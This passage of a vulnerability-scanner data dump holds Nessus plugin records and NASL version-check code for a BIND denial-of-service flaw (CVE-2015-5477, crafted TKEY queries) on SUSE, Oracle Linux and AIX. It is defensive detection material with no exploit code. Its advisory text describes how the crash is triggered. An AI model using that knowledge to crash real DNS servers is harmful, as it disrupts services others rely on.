/ bind97-chroot / bind97-debuginfo / bind97-devel / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:46", "description": "bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-30T00:00:00", "type": "nessus", "title": "SUSE SLED11 / SLES11 Security Update : bind (SUSE-SU-2015:1304-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bind", "p-cpe:/a:novell:suse_linux:bind-chrootenv", "p-cpe:/a:novell:suse_linux:bind-devel", "p-cpe:/a:novell:suse_linux:bind-doc", "p-cpe:/a:novell:suse_linux:bind-libs", "p-cpe:/a:novell:suse_linux:bind-utils", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2015-1304-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85121", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1304-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85121);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"SUSE SLED11 / SLES11 Security Update : bind (SUSE-SU-2015:1304-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or\nconfiguration options limiting or denying service because the\nexploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5477/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151304-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?52612bed\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-bind-12008=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP3 :\n\nzypper in -t patch sdksp3-bind-12008=1\n\nSUSE Linux Enterprise Server for VMWare 11-SP3 :\n\nzypper in -t patch slessp3-bind-12008=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-bind-12008=1\n\nSUSE Linux Enterprise Server 11-SP3 :\n\nzypper in -t patch slessp3-bind-12008=1\n\nSUSE Linux Enterprise Server 11-SP2-LTSS :\n\nzypper in -t patch slessp2-bind-12008=1\n\nSUSE Linux Enterprise Desktop 11-SP4 :\n\nzypper in -t patch sledsp4-bind-12008=1\n\nSUSE Linux Enterprise Desktop 11-SP3 :\n\nzypper in -t patch sledsp3-bind-12008=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-bind-12008=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-bind-12008=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED11|SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11 / SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2/3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-chrootenv-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-doc-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-chrootenv-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-doc-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-chrootenv-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-devel-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-doc-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:55", "description": "From Red Hat Security Advisory 2015:1515 :\n\nUpdated bind97 packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-30T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : bind97 (ELSA-2015-1515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bind97", "p-cpe:/a:oracle:linux:bind97-chroot", "p-cpe:/a:oracle:linux:bind97-devel", "p-cpe:/a:oracle:linux:bind97-libs", "p-cpe:/a:oracle:linux:bind97-utils", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2015-1515.NASL", "href": "https://www.tenable.com/plugins/nessus/85117", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1515 and \n# Oracle Linux Security Advisory ELSA-2015-1515 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85117);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1515\");\n\n script_name(english:\"Oracle Linux 5 : bind97 (ELSA-2015-1515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1515 :\n\nUpdated bind97 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-July/005225.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind97 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 / bind97-chroot / bind97-devel / bind97-libs / bind97-utils\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:06:14", "description": "ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "AIX 6.1 TL 8 : bind9 (IV75694)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV75694.NASL", "href": "https://www.tenable.com/plugins/nessus/85417", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory bind9_advisory8.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85417);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"AIX 6.1 TL 8 : bind9 (IV75694)\");\n script_summary(english:\"Check for APAR IV75694\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"06\", patch:\"IV75694s6a\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.8.19\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:06:15", "description": "ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "AIX 7.1 TL 3 : bind9 (IV75693)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV75693.NASL", "href": "https://www.tenable.com/plugins/nessus/85416", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory bind9_advisory8.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85416);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"AIX 7.1 TL 3 : bind9 (IV75693)\");\n script_summary(english:\"Check for APAR IV75693\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"03\", sp:\"05\", patch:\"(IV75693s5a|IV78095m5a)\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.0.0\", maxfilesetver:\"7.1.3.45\") < 0) flag++;\n\nif (flag)\n{\n aix_report_extra = ereg_replace(string:aix_report_get(), pattern:\"[()]\", replace:\"\");\n aix_report_extra = ereg_replace(string:aix_report_extra, pattern:\"[|]\", replace:\" or \");\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:06:22", "description": "bind was updated to fix one security issue :\n\nCVE-2015-5477: Remote Denial-of-Service via TKEY queries. (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-03T00:00:00", "type": "nessus", "title": "SUSE SLES10 Security Update : bind (SUSE-SU-2015:1322-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bind", "p-cpe:/a:novell:suse_linux:bind-chrootenv", "p-cpe:/a:novell:suse_linux:bind-devel", "p-cpe:/a:novell:suse_linux:bind-doc", "p-cpe:/a:novell:suse_linux:bind-libs", "p-cpe:/a:novell:suse_linux:bind-utils", "cpe:/o:novell:suse_linux:10"], "id": "SUSE_SU-2015-1322-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85179", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1322-1.\n# The text itself is copyright (C) 